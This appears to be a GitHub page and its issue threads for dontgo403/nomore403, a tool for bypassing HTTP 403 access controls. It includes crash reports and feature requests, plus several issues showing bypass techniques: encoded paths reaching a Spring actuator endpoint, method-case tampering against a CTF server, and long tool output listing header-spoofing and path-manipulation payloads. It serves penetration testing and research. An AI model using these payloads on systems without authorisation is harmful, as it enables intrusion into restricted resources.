Tool to bypass 403/40X response codes.
License: MIT License
Hi, I'm Daniel PΓΊa (a.k.a. devploit) and I'm an infosec lover from CΓ‘diz (Spain). I'm living on Malaga where I work and do my stuff. I also participate in CTFs as a hobby. My teams are ripp3rs & R3Vengers.
I'm currently working at Freepik Company as Security Tech Lead.
In addition to working and participating in CTFs I also (try to) maintain a repository of payloads that may be useful for other security researchers. You can visit it at: pwny.cc.
Also, you can follow me on:
![dependabot[bot] avatar](https://avatars.githubusercontent.com/in/29110?v=4 "dependabot[bot]")
Fails to parse request from Burp:
./dontgo403 -r /home/kali/tmp/req
panic: runtime error: index out of range [1] with length 1
goroutine 1 [running]:
dontgo403/cmd.requester({0xc00016a100, 0x7d}, {0x0?, 0x0?}, {0x0, 0x0}, {0xc00017e400?, 0x10, 0x10}, {0x0, ...}, ...)
/home/kali/hacktools/web/dontgo403/cmd/requester.go:393 +0x747
dontgo403/cmd.loadFlagsFromRequestFile({0x7fffd2c94fb1?, 0x0?}, 0x0, 0x0?)
/home/kali/hacktools/web/dontgo403/cmd/api.go:139 +0x305
dontgo403/cmd.glob..func1(0xb7cd00?, {0x860f2b?, 0x2?, 0x2?})
/home/kali/hacktools/web/dontgo403/cmd/root.go:57 +0x291
github.com/spf13/cobra.(*Command).execute(0xb7cd00, {0xc00011c160, 0x2, 0x2})
/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:876 +0x67b
github.com/spf13/cobra.(*Command).ExecuteC(0xb7cd00)
/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:990 +0x3bd
github.com/spf13/cobra.(*Command).Execute(...)
/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:918
dontgo403/cmd.Execute()
/home/kali/hacktools/web/dontgo403/cmd/root.go:75 +0x25
main.main()
/home/kali/hacktools/web/dontgo403/main.go:22 +0x17
Here is the request:
cat ~/tmp/req
POST /openai/deployments/text-gpt-4-32k/chat/completions?api-version=2023-03-15-preview HTTP/1.1
Host: cdo-eastus-openai.openai.azure.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Connection: close
Always getting this issue
It would be very helpful if you could tag releases as well. This would enable distributions to fetch the source from GitHub instead of working with git checkouts.
Thanks
I am getting this when program starting
CUSTOM PATHS
[####] CUSTOM PATHS [####]
2022/09/11 13:37:26 parse "https://REDACTED.DOMAIN/admin.php%": invalid URL escape "%"
always in PATH CASE SWITCHING I got
zsh: killed ./nomore403
how I can solve this
Hi,
The Tool is super cool & super fast really appreciate The Time For Creating This Tool, But am Facing an issues With This Tool, The First issue as, when i run The Tool it works Fine But it comes in CUSTOM PATHS Exploit and it shows Me This Error
`panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x7518b4]
goroutine 2396 [running]:
dontgo403/cmd.requestMidPaths.func1({0xc000fcb2dc, 0x4})
/opt/tools/dontgo403/cmd/requester.go:268 +0x474
created by dontgo403/cmd.requestMidPaths
/opt/tools/dontgo403/cmd/requester.go:250 +`
The Second issue is, sometimes The Tool Works Fine But it gives me This Error
2022/01/18 22:00:34 Patch "https://www.google.com/": dial tcp: i/o timeout
For example, we want to do bypass the actuator/env endpoint
curl http://[MASK].com/actuator/env
Use dontgo403 (default config)
curl http://[MASK].com/actuator/env;%2f..%2f..
Response: 403 Forbidden
When we add urlencode(some senstive files), /actuator/env
curl http://[MASK].com/act%75ato/env;%2f..%2f..
Response:
{
"activeProfiles" : [ "dev" ],
"propertySources" : [ {
.....
maybe this method can bypass some incorrect nginx configuration
my tools support this feature, but I think your tool is better than mine in terms of coding structure and practicality. If I had found your tool earlier, i wouldn't have reinvented the wheel. LOL
I hope u will consider adding this feature.
Currently, the payload position defaults to the end of the URL. Being able to specify a custom payload position would be beneficial in certain cases.
For example:
./nomore -u example.com/organization/100/user/200?foo=bar
In this case, one may want to target the "organization ID" (100) and/or the "user ID" (200) instead of inserting payloads at the end.
An added bonus would be if it was possible to specify multiple positions.
a -r/--rate option would be cool, so we can specify a delay in ms between each request
@devploit Needed some functionality like -r for redirect (optional) and also an argument to avoid the host if it throws 429 Status code
ZH-CNοΌreleasesε
ιδΈζΎpayloadsοΌι£δ½ εΉ²εθΏζε
οΌδ½ ηreleasesιζ仢倧ε°ε±
ηΆζ8MοΌε°εΊζΎδΊε₯οΌ
EN-USοΌWhy are you still packing the packages when there are no payloads in the releases package? Is the file size in your releases surprisingly 8M? What exactly did it put?
Bad testing
When i try to bypass 403 it send lots of requests so low bandwidth server can't those request
I recently read article on 403 bypass here:
https://medium.com/@abbasheybati1/403-bypass-lyncdiscover-microsoft-com-db2778458c33
Iwant to know is dontgo403 does this or not? If not how i can add this?
Hi,
When I run the below error occurred.
./dontgo403 -u https://www.target.com/shoppingcart
[####] HTTP METHODS [####]
2022/09/14 23:03:47 open payloads/httpmethods: no such file or directory
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x468041]
goroutine 1 [running]:
fmt.(*buffer).writeString(...)
/usr/lib/go-1.19/src/fmt/print.go:82
fmt.(*fmt).padString(0x41b7c6?, {0x0, 0x13})
/usr/lib/go-1.19/src/fmt/format.go:110 +0x247
fmt.(*fmt).fmtS(0xc0002d00d0?, {0x0?, 0xc00010c800?})
/usr/lib/go-1.19/src/fmt/format.go:359 +0x3f
fmt.(*pp).fmtString(0x4f4bc6?, {0x0?, 0xc0004429e9?}, 0x0?)
/usr/lib/go-1.19/src/fmt/print.go:474 +0x86
fmt.(*pp).printArg(0xc0002d00d0, {0x7e7bc0?, 0xc0004729a0}, 0x76)
/usr/lib/go-1.19/src/fmt/print.go:725 +0x21e
fmt.(*pp).doPrintf(0xc0002d00d0, {0xc000442a07, 0x9}, {0xc00010cac8?, 0x3, 0x3})
/usr/lib/go-1.19/src/fmt/print.go:1057 +0x288
fmt.Fprintf({0x919d00, 0xc000706580}, {0xc000442a07, 0x9}, {0xc00010cac8, 0x3, 0x3})
/usr/lib/go-1.19/src/fmt/print.go:204 +0x75
github.com/cheynewallace/tabby.(*Tabby).AddLine(0xc000014008, {0xc00010cac8, 0x3, 0x3})
/root/go/pkg/mod/github.com/cheynewallace/[email protected]/tabby.go:31 +0x59
dontgo403/cmd.printResponse({0xc00092e000, 0x550, 0xc0000264ac?})
/home/dontgo403/cmd/requester.go:36 +0x2f6
dontgo403/cmd.requestHeaders({0xc0003ee4e0, 0x2f}, {0xc0005926e0, 0x1, 0x1}, 0xc000169b90, {0x0, 0x0}, {0x7ffcc82d3310, 0xe}, ...)
/home/dontgo403/cmd/requester.go:136 +0x2d3
dontgo403/cmd.requester({0xc000129919, 0x2e}, {0x0?, 0x0?}, {0x7ffcc82d3322, 0x6f}, {0xc000037100, 0x1, 0x0?}, {0x0, ...}, ...)
/home/dontgo403/cmd/requester.go:291 +0x385
dontgo403/cmd.glob..func1(0xb7bd80?, {0x861224?, 0x6?, 0x6?})
/home/dontgo403/cmd/root.go:48 +0x31c
github.com/spf13/cobra.(*Command).execute(0xb7bd80, {0xc000024080, 0x6, 0x6})
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:876 +0x67b
github.com/spf13/cobra.(*Command).ExecuteC(0xb7bd80)
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:990 +0x3bd
github.com/spf13/cobra.(*Command).Execute(...)
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:918
dontgo403/cmd.Execute()
/home/dontgo403/cmd/root.go:63 +0x25
main.main()
/home/dontgo403/main.go:22 +0x17
Description:
It would be useful to have a -u flag that can take a URL (as it currently does), but could also accept a file containing multiple URLs as input. Additionally, it would be beneficial to have a -o option to save results and a -f option to choose JSON output.
Required Features:
-u flag:
-o option:
-f option:
Benefits:
Hello,
Thanks for your Great Work!
Is it possible to add HTTP VERB TAMPERING Mehtods using Case Sensitivity Manipulation?
Like:
GeT, gEt, poST, PosT etc?
Use case:
------------------------CTF--------------------
cat /var/www/html/admin/.htaccess
<If "%{REQUEST_METHOD} == 'HEAD' || %{REQUEST_METHOD} == 'OPTIONS' || %{REQUEST_METHOD} == 'PATCH' || %{REQUEST_METHOD} == 'GET' || %{REQUEST_METHOD} == 'POST' || %{REQUEST_METHOD} == 'PUT' || %{REQUEST_METHOD} == 'DELETE' || %{REQUEST_METHOD} == 'TRACE'">
deny from all
</If>
#</Directory>
-------------------------------------------------
WooZooO@Priv:~$ curl -X POST http://172.16.67.124/admin/index.php -I
HTTP/1.1 403 Forbidden
Date: Tue, 19 Mar 2024 05:56:01 GMT
Server: Apache
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
WooZooO@Priv:~$ curl -X **PoST** http://172.16.67.124/admin/index.php -I
**HTTP/1.1 200 OK**
Date: Tue, 19 Mar 2024 05:56:05 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Content-Length: 96
Content-Type: text/html; charset=UTF-8
AFAIK current version of "nomore403" doesn't use this methods:
./nomore403 --random-agent -i "192.168.12.12" -v -u http://172.16.67.124/admin/ -r --random-agent -H "Hello: Cookie"
________ ________ ________ ________ ________ ________ ________ ________ ________
β± β± β²β± β²β± β± β²β± β²β± β²β± β²β± β± β²β± β²β±__ β²
β± β± β± β± β± β± β± β± β± __β± β± β± β±__ β±
β± β± β± β± β± _β± __/____ β± β± β±
β²__β±_____β±β²________β±β²__β±__β±__β±β²________β±β²____β±___β±β²________β± β±____β±β²________β±β²________β±
Target: http://172.16.67.124/admin/
Headers: {User-Agent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15}
Headers: {Hello Cookie}
Proxy: false
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15
Method: GET
Payloads folder: payloads
Custom bypass IP: 192.168.12.12
Follow Redirects: true
Rate Limit detection: false
Verbose: true
βββββββββββββ DEFAULT REQUEST βββββββββββββ
403 372 bytes http://172.16.67.124/admin/
βββββββββββββ VERB TAMPERING ββββββββββββββ
200 393 bytes TRACE
403 372 bytes COPY
400 392 bytes CONNECT
403 372 bytes VERSION-CONTROL
403 372 bytes OPTIONS
403 372 bytes PUT
403 372 bytes POUET
403 372 bytes TRACK
403 372 bytes POST
403 372 bytes MOVE
403 372 bytes PATCH
403 143 bytes HEAD
403 372 bytes LABEL
403 372 bytes GET
403 372 bytes UNCHECKOUT
403 372 bytes DELETE
403 372 bytes LOCK
403 372 bytes UPDATE
βββββββββββββ HEADERS βββββββββββββββββββββ
403 372 bytes Request-Uri: 192.168.12.12
403 372 bytes Referrer: 192.168.12.12
403 372 bytes X-Forwarded-Proto: 192.168.12.12
403 372 bytes Referer: 192.168.12.12
403 372 bytes X-Forwarded-Host: 192.168.12.12
403 372 bytes Redirect: 192.168.12.12
403 372 bytes X-Forwarded-For-Original: 192.168.12.12
403 372 bytes Proxy-Host: 192.168.12.12
403 372 bytes X-Referrer: 192.168.12.12
403 372 bytes Proxy: 192.168.12.12
403 372 bytes Proxy-Url: 192.168.12.12
403 372 bytes Real-Ip: 192.168.12.12
403 372 bytes X-Forwarded-For: 192.168.12.12
403 372 bytes X-Remote-Addr: 192.168.12.12
403 372 bytes X-Originating-IP: 192.168.12.12
403 372 bytes Http-Url: 192.168.12.12
403 372 bytes X-Forwarded-By: 192.168.12.12
403 372 bytes X-Proxy-Url: 192.168.12.12
403 372 bytes X-ProxyUser-Ip: 192.168.12.12
403 372 bytes X-Forwarded: 192.168.12.12
403 372 bytes Forwarded-For-Ip: 192.168.12.12
403 372 bytes Profile: 192.168.12.12
403 372 bytes Origin: 192.168.12.12
403 372 bytes X-Real-IP: 192.168.12.12
403 372 bytes Host: 192.168.12.12
403 372 bytes X-Original-URL: 192.168.12.12
403 372 bytes Forwarded-For: 192.168.12.12
403 372 bytes X-Forward-For: 192.168.12.12
403 372 bytes X-Original-Remote-Addr: 192.168.12.12
403 372 bytes X-Forward: 192.168.12.12
403 372 bytes X-HTTP-Host-Override: 192.168.12.12
403 372 bytes X-Host: 192.168.12.12
403 372 bytes X-HTTP-DestinationURL: 192.168.12.12
403 372 bytes X-Originally-Forwarded-For: 192.168.12.12
403 372 bytes X-Forwarded-Server: 192.168.12.12
403 372 bytes X-Forwarder-For: 192.168.12.12
403 372 bytes Uri: 192.168.12.12
403 372 bytes Forwarded: 192.168.12.12
403 372 bytes Client-IP: 192.168.12.12
403 372 bytes True-Client-IP: 192.168.12.12
403 372 bytes Destination: 192.168.12.12
403 372 bytes X-Arbitrary: 192.168.12.12
403 372 bytes CF-Connecting_IP: 192.168.12.12
403 372 bytes X-Custom-IP-Authorization: 192.168.12.12
403 372 bytes Access-Control-Allow-Origin: 192.168.12.12
403 372 bytes Base-Url: 192.168.12.12
403 372 bytes X-Client-IP: 192.168.12.12
403 372 bytes Url: 192.168.12.12
403 372 bytes CF-Connecting-IP: 192.168.12.12
403 372 bytes X-Remote-IP: 192.168.12.12
403 372 bytes X-Rewrite-URL: 192.168.12.12
403 372 bytes X-WAP-Profile: 192.168.12.12
403 372 bytes X-Real-Ip: 192.168.12.12
403 372 bytes X-HTTP-Method-Override POST
403 372 bytes X-True-IP: 192.168.12.12
403 372 bytes Referer /admin
403 372 bytes X-Rewrite-URL /admin
403 372 bytes X-Forwarded-Port 80
403 372 bytes X-Override-URL /admin
403 372 bytes X-Forwarded-Port 8443
403 372 bytes X-Forwarded-Port 8080
403 372 bytes X-Forwarded-Port 4443
403 372 bytes X-Forwarded-Port 443
403 372 bytes X-Original-URL /admin
403 372 bytes X-HTTP-Method-Override PUT
βββββββββββββ CUSTOM PATHS ββββββββββββββββ
403 373 bytes http://172.16.67.124/admin/1
403 372 bytes http://172.16.67.124/admin//.
403 372 bytes http://172.16.67.124/admin/?
403 372 bytes http://172.16.67.124/admin/??
403 376 bytes http://172.16.67.124/admin/.svc
403 377 bytes http://172.16.67.124/admin/.wsdl
403 376 bytes http://172.16.67.124/admin/.svc?wsdl
403 372 bytes http://172.16.67.124/admin//
403 373 bytes http://172.16.67.124/admin/0
403 372 bytes http://172.16.67.124/admin///
403 375 bytes http://172.16.67.124/admin/..;
403 372 bytes http://172.16.67.124/admin/./
403 376 bytes http://172.16.67.124/admin/..\;
403 372 bytes http://172.16.67.124/admin//
403 376 bytes http://172.16.67.124/admin/.css
403 377 bytes http://172.16.67.124/admin/.html
403 373 bytes http://172.16.67.124/admin/%61
403 372 bytes http://172.16.67.124/admin/.
403 373 bytes http://172.16.67.124/admin/-
403 372 bytes http://172.16.67.124/admin/?debug=true
403 372 bytes http://172.16.67.124/admin/?
403 377 bytes http://172.16.67.124/admin/&
403 372 bytes http://172.16.67.124/admin/??
403 372 bytes http://172.16.67.124/admin/?WSDL
403 372 bytes http://172.16.67.124/admin/?debug=1
403 377 bytes http://172.16.67.124/admin/.json
403 372 bytes http://172.16.67.124/admin///
403 372 bytes http://172.16.67.124/admin/???
403 379 bytes http://172.16.67.124/admin/.random
403 376 bytes http://172.16.67.124/admin/\/\/
403 377 bytes http://172.16.67.124/admin/debug
403 376 bytes http://172.16.67.124/admin/.php
403 372 bytes http://172.16.67.124/admin/?testparam
403 373 bytes http://172.16.67.124/admin/~
403 372 bytes http://172.16.67.124/admin/?param
403 374 bytes http://172.16.67.124/admin/%20/
403 373 bytes http://172.16.67.124/admin/%20
403 373 bytes http://172.16.67.124/admin/%0D
403 373 bytes http://172.16.67.124/admin/%0A
404 368 bytes http://172.16.67.124/admin/%00
403 373 bytes http://172.16.67.124/admin/%09
403 372 bytes http://172.16.67.124/admin/#test
403 372 bytes http://172.16.67.124/admin/#
403 375 bytes http://172.16.67.124/admin/Β°/
403 376 bytes http://172.16.67.124/admin/..;/
403 372 bytes http://172.16.67.124/admin/#/./
403 372 bytes http://172.16.67.124/admin/#/
403 376 bytes http://172.16.67.124/admin//..;/
403 377 bytes http://172.16.67.124/admin/..\;/
403 373 bytes http://172.16.67.124/admin/~
403 372 bytes http://172.16.67.124/admin//./
403 373 bytes http://172.16.67.124/admin//*
403 377 bytes http://172.16.67.124/admin/false
403 376 bytes http://172.16.67.124/admin//..%3B/
404 376 bytes http://172.16.67.124/admin/;%2f..%2f..%2f
403 373 bytes http://172.16.67.124/admin/%3f
403 377 bytes http://172.16.67.124/admin/%26
403 373 bytes http://172.16.67.124/admin/%23
403 373 bytes http://172.16.67.124/admin/%25
403 376 bytes http://172.16.67.124/admin/null
403 376 bytes http://172.16.67.124/admin/true
403 372 bytes http://172.16.67.124/%2e/admin/
404 372 bytes http://172.16.67.124/%252f/admin/
404 369 bytes http://172.16.67.124/%20admin/
404 370 bytes http://172.16.67.124/%20/admin/
404 369 bytes http://172.16.67.124/%23admin/
404 374 bytes http://172.16.67.124/%252f%252fadmin/
404 370 bytes http://172.16.67.124/%23%3fadmin/
404 367 bytes http://172.16.67.124/%admin/
404 369 bytes http://172.16.67.124/%09admin/
404 371 bytes http://172.16.67.124/%09..admin/
404 370 bytes http://172.16.67.124/%09;admin/
404 369 bytes http://172.16.67.124/%2fadmin/
404 371 bytes http://172.16.67.124/%2f%20%23admin/
404 370 bytes http://172.16.67.124/%2f%23admin/
404 370 bytes http://172.16.67.124/%2f%2fadmin/
404 371 bytes http://172.16.67.124/%2f%3b%2fadmin/
200 3427 bytes http://172.16.67.124/#admin/
404 364 bytes http://172.16.67.124/..%00/admin/
404 372 bytes http://172.16.67.124/%3b%2f%2e.admin/
404 377 bytes http://172.16.67.124/%3b%2f%2e%2e%2f%2e%2e%2f%2fadmin/
404 372 bytes http://172.16.67.124/%3b%2f..admin/
404 373 bytes http://172.16.67.124/%26admin/
404 369 bytes http://172.16.67.124/%2eadmin/
200 3427 bytes http://172.16.67.124/#?admin/
404 370 bytes http://172.16.67.124/%09%3badmin/
404 370 bytes http://172.16.67.124/%2e%2eadmin/
404 371 bytes http://172.16.67.124/%2e%2e%2fadmin/
400 392 bytes http://172.16.67.124/%2e%2e/admin/
404 373 bytes http://172.16.67.124/&admin/
404 370 bytes http://172.16.67.124/..admin/
400 392 bytes http://172.16.67.124/.%2e/admin/
404 370 bytes http://172.16.67.124/%3f%23admin/
404 370 bytes http://172.16.67.124/%3f%3fadmin/
404 377 bytes http://172.16.67.124/%3b/%2e%2e/..%2f%2fadmin/
404 372 bytes http://172.16.67.124/%3b/%2e.admin/
404 372 bytes http://172.16.67.124/..%0d/admin/
404 369 bytes http://172.16.67.124/%3fadmin/
404 372 bytes http://172.16.67.124/%3b/..admin/
404 375 bytes http://172.16.67.124/%3b//%2f../admin/
404 370 bytes http://172.16.67.124/%3b%09admin/
404 369 bytes http://172.16.67.124/%3badmin/
404 370 bytes http://172.16.67.124/%2f/admin/
404 371 bytes http://172.16.67.124/..%09admin/
404 370 bytes http://172.16.67.124/%2f%3fadmin/
404 375 bytes http://172.16.67.124/%3b/%2f%2f../admin/
404 372 bytes http://172.16.67.124/%2f%3b%2f%2fadmin/
404 371 bytes http://172.16.67.124/%2f%3f/admin/
404 364 bytes http://172.16.67.124/..%00;/admin/
404 371 bytes http://172.16.67.124/..%3Badmin/
404 371 bytes http://172.16.67.124/..%2fadmin/
404 372 bytes http://172.16.67.124/%3b%2f%2e%2eadmin/
400 392 bytes http://172.16.67.124/../admin/
404 373 bytes http://172.16.67.124/..%0d;/admin/
403 372 bytes http://172.16.67.124/.//./admin/
404 364 bytes http://172.16.67.124/..%00/;admin/
400 392 bytes http://172.16.67.124/.././admin/
404 371 bytes http://172.16.67.124/.;/admin/
404 373 bytes http://172.16.67.124/..%ff/;admin/
404 372 bytes http://172.16.67.124/..%5c/admin/
404 371 bytes http://172.16.67.124/..%5cadmin/
404 373 bytes http://172.16.67.124/..;%ff/admin/
404 373 bytes http://172.16.67.124/..;%0d/admin/
404 365 bytes http://172.16.67.124/..;%00/admin/
404 371 bytes http://172.16.67.124/..%ffadmin/
404 372 bytes http://172.16.67.124/.\;/admin/
404 371 bytes http://172.16.67.124//%252fadmin/
404 370 bytes http://172.16.67.124//%2e%2eadmin/
404 372 bytes http://172.16.67.124//%252e/admin/
404 375 bytes http://172.16.67.124//%252e%253b/admin/
404 375 bytes http://172.16.67.124//%252e%252f/admin/
404 373 bytes http://172.16.67.124/..%0d/;admin/
404 373 bytes http://172.16.67.124/..;\;admin/
404 372 bytes http://172.16.67.124/..\;admin/
404 373 bytes http://172.16.67.124/..;\\admin/
404 372 bytes http://172.16.67.124/..\\admin/
403 372 bytes http://172.16.67.124/./admin/
404 369 bytes http://172.16.67.124/./.admin/
404 372 bytes http://172.16.67.124/..;/admin/
403 372 bytes http://172.16.67.124//admin/
404 371 bytes http://172.16.67.124/..;admin/
404 373 bytes http://172.16.67.124/.jsonadmin/
404 371 bytes http://172.16.67.124//%20%20/admin/
403 377 bytes http://172.16.67.124/.htmladmin/
404 363 bytes http://172.16.67.124//%20#admin/
404 378 bytes http://172.16.67.124//%252e%252e%253b/admin/
400 392 bytes http://172.16.67.124//%2e%2e/admin/
404 372 bytes http://172.16.67.124//%2e%2e%3b/admin/
404 371 bytes http://172.16.67.124//%2e%3b/admin/
404 378 bytes http://172.16.67.124//%252e%252e%252f/admin/
404 371 bytes http://172.16.67.124//%2e%3b//admin/
404 371 bytes http://172.16.67.124//%2e%2f/admin/
404 373 bytes http://172.16.67.124/..%ff;/admin/
404 369 bytes http://172.16.67.124//%2fadmin/
404 370 bytes http://172.16.67.124//%3b/admin/
403 372 bytes http://172.16.67.124//%2e//admin/
404 371 bytes http://172.16.67.124//..%2fadmin/
404 369 bytes http://172.16.67.124//*admin/
404 370 bytes http://172.16.67.124//*/admin/
403 372 bytes http://172.16.67.124//%2e/admin/
404 370 bytes http://172.16.67.124//%20%23admin/
404 369 bytes http://172.16.67.124//.admin/
400 392 bytes http://172.16.67.124//../admin/
404 370 bytes http://172.16.67.124//..admin/
403 372 bytes http://172.16.67.124//../../..//admin/
400 392 bytes http://172.16.67.124//../..//../admin/
400 392 bytes http://172.16.67.124//../..;/admin/
404 374 bytes http://172.16.67.124//..%2f..%2fadmin/
400 392 bytes http://172.16.67.124//../;/../admin/
400 392 bytes http://172.16.67.124//..//../admin/
400 392 bytes http://172.16.67.124//../.;/../admin/
403 372 bytes http://172.16.67.124//../..//admin/
400 392 bytes http://172.16.67.124//..//../../admin/
404 372 bytes http://172.16.67.124//..//..;/admin/
400 392 bytes http://172.16.67.124//.././../admin/
400 392 bytes http://172.16.67.124//../;/admin/
400 392 bytes http://172.16.67.124//../../admin/
404 377 bytes http://172.16.67.124//..%2f..%2f..%2fadmin/
400 392 bytes http://172.16.67.124//../../../admin/
403 372 bytes http://172.16.67.124//..//admin/
404 372 bytes http://172.16.67.124//..;%2fadmin/
400 392 bytes http://172.16.67.124///../../admin/
403 372 bytes http://172.16.67.124//..;/../admin/
403 372 bytes http://172.16.67.124///admin/
404 369 bytes http://172.16.67.124///.admin/
404 370 bytes http://172.16.67.124///..admin/
403 372 bytes http://172.16.67.124///./admin/
404 380 bytes http://172.16.67.124//..;%2f..;%2f..;%2fadmin/
404 370 bytes http://172.16.67.124////..admin/
404 371 bytes http://172.16.67.124//.;//admin/
404 372 bytes http://172.16.67.124//..;/admin/
400 392 bytes http://172.16.67.124////../admin/
404 372 bytes http://172.16.67.124//..;//../admin/
404 372 bytes http://172.16.67.124////..;//admin/
404 371 bytes http://172.16.67.124////..;admin/
404 376 bytes http://172.16.67.124//..;/..;/admin/
200 3427 bytes http://172.16.67.124///?anythingadmin/
403 372 bytes http://172.16.67.124////..//admin/
404 370 bytes http://172.16.67.124//;//admin/
404 370 bytes http://172.16.67.124//;xadmin/
404 371 bytes http://172.16.67.124///.;/admin/
404 370 bytes http://172.16.67.124//x//../admin/
404 374 bytes http://172.16.67.124//x/..;//admin/
404 373 bytes http://172.16.67.124/;%09..;admin/
404 372 bytes http://172.16.67.124/;%2f..admin/
404 377 bytes http://172.16.67.124/;%2f..%2f%2e%2e%2f%2fadmin/
404 372 bytes http://172.16.67.124/;%2f%2e%2eadmin/
404 377 bytes http://172.16.67.124/;%2f%2e%2e%2f%2e%2e%2f%2fadmin/
404 375 bytes http://172.16.67.124/;%2f%2f/../admin/
404 370 bytes http://172.16.67.124//x/../;/admin/
404 376 bytes http://172.16.67.124//..;%2f..;%2fadmin/
404 377 bytes http://172.16.67.124/;%2f..%2f/../admin/
404 377 bytes http://172.16.67.124/;%2f..//..%2fadmin/
404 377 bytes http://172.16.67.124/;%2f../%2f..%2fadmin/
403 372 bytes http://172.16.67.124//./admin/
404 376 bytes http://172.16.67.124/;%2f..//;/admin/
404 370 bytes http://172.16.67.124//x/;/../admin/
404 376 bytes http://172.16.67.124//x/;/..;/admin/
403 372 bytes http://172.16.67.124/////admin/
404 378 bytes http://172.16.67.124/;%2f../;/;/;admin/
404 375 bytes http://172.16.67.124/;%2f/%2f../admin/
404 370 bytes http://172.16.67.124///;/admin/
403 372 bytes http://172.16.67.124//.//admin/
404 378 bytes http://172.16.67.124//..;/;/..;/admin/
404 372 bytes http://172.16.67.124//..;//admin/
404 376 bytes http://172.16.67.124//..;//..;/admin/
404 372 bytes http://172.16.67.124////..;/admin/
404 370 bytes http://172.16.67.124//;/admin/
404 372 bytes http://172.16.67.124/;%09..admin/
403 372 bytes http://172.16.67.124//x/../admin/
404 371 bytes http://172.16.67.124//;x/admin/
404 374 bytes http://172.16.67.124//x//..;/admin/
404 374 bytes http://172.16.67.124//x/..;/admin/
404 377 bytes http://172.16.67.124/;%2f..%2f/..%2fadmin/
404 374 bytes http://172.16.67.124/;%2f..%2f/admin/
404 377 bytes http://172.16.67.124/;%2f..%2f..%2f%2fadmin/
403 372 bytes http://172.16.67.124//x/..//admin/
404 377 bytes http://172.16.67.124/;%2f..//;/;admin/
404 376 bytes http://172.16.67.124//x/..;/;/admin/
404 375 bytes http://172.16.67.124/;%2f..///admin/
404 377 bytes http://172.16.67.124/;%2f../%2f../admin/
404 377 bytes http://172.16.67.124/;%2f..//../admin/
404 376 bytes http://172.16.67.124/;%2f..;///admin/
404 376 bytes http://172.16.67.124/;%2f../;//admin/
404 377 bytes http://172.16.67.124/;%2f../;/;/admin/
404 376 bytes http://172.16.67.124/;%2f..///;admin/
404 375 bytes http://172.16.67.124/;%2f//..%2fadmin/
404 370 bytes http://172.16.67.124/;%09admin/
404 371 bytes http://172.16.67.124/;%09;admin/
404 377 bytes http://172.16.67.124/;%2f/;/..;/admin/
404 376 bytes http://172.16.67.124/;%2f/;/../admin/
404 377 bytes http://172.16.67.124/;%2f..;//;/admin/
404 377 bytes http://172.16.67.124/;%2f..;/;//admin/
404 376 bytes http://172.16.67.124/;%2f//..;/admin/
404 375 bytes http://172.16.67.124/;%2f//../admin/
404 381 bytes http://172.16.67.124//.randomstringadmin/
404 371 bytes http://172.16.67.124///..;admin/
404 372 bytes http://172.16.67.124/;/%2e%2eadmin/
404 378 bytes http://172.16.67.124/;%2f;/;/..;/admin/
404 371 bytes http://172.16.67.124//.;/admin/
404 374 bytes http://172.16.67.124//..;/;/admin/
404 376 bytes http://172.16.67.124/;%2f;//../admin/
404 374 bytes http://172.16.67.124/;/%2e%2e%2f%2fadmin/
404 374 bytes http://172.16.67.124/;/%2e%2e%2f/admin/
404 372 bytes http://172.16.67.124/;/%2e.admin/
404 369 bytes http://172.16.67.124/;admin/
404 372 bytes http://172.16.67.124/;/.%2eadmin/
404 375 bytes http://172.16.67.124/;/%2f%2f../admin/
404 375 bytes http://172.16.67.124/;/%2f/../admin/
404 375 bytes http://172.16.67.124/;/%2f/..%2fadmin/
403 372 bytes http://172.16.67.124/;/%2e%2e/admin/
200 3427 bytes http://172.16.67.124/???admin/
403 372 bytes http://172.16.67.124/;/../.;/../admin/
403 372 bytes http://172.16.67.124/;/..//admin/
200 3427 bytes http://172.16.67.124/??admin/
200 3427 bytes http://172.16.67.124/?admin/
400 392 bytes http://172.16.67.124/;/.././../admin/
400 392 bytes http://172.16.67.124/;/../../admin/
404 375 bytes http://172.16.67.124/;/../%2f/admin/
404 371 bytes http://172.16.67.124/;x;admin/
404 375 bytes http://172.16.67.124/;/..%2f//admin/
403 372 bytes http://172.16.67.124/;/../admin/
403 372 bytes http://172.16.67.124/;/../..//admin/
404 371 bytes http://172.16.67.124/;x/admin/
404 370 bytes http://172.16.67.124/;xadmin/
404 376 bytes http://172.16.67.124/;/..%2f..%2fadmin/
404 374 bytes http://172.16.67.124/;/..%2f/admin/
404 377 bytes http://172.16.67.124/;foo=bar/admin/
404 370 bytes http://172.16.67.124/;///../admin/
404 370 bytes http://172.16.67.124/;///..//admin/
404 372 bytes http://172.16.67.124/;///..admin/
404 372 bytes http://172.16.67.124/;//..admin/
403 372 bytes http://172.16.67.124/;//../../admin/
404 377 bytes http://172.16.67.124/;/.%2e/%2e%2e/%2fadmin/
404 373 bytes http://172.16.67.124/;/.;.admin/
404 373 bytes http://172.16.67.124/;/..;admin/
404 370 bytes http://172.16.67.124/;/../;/admin/
403 372 bytes http://172.16.67.124/;/../;/../admin/
404 373 bytes http://172.16.67.124/;/..%2fadmin/
403 372 bytes http://172.16.67.124/;/..///admin/
403 372 bytes http://172.16.67.124/;/..//../admin/
404 375 bytes http://172.16.67.124/;/..//%2fadmin/
403 372 bytes http://172.16.67.124/;/..//%2e%2e/admin/
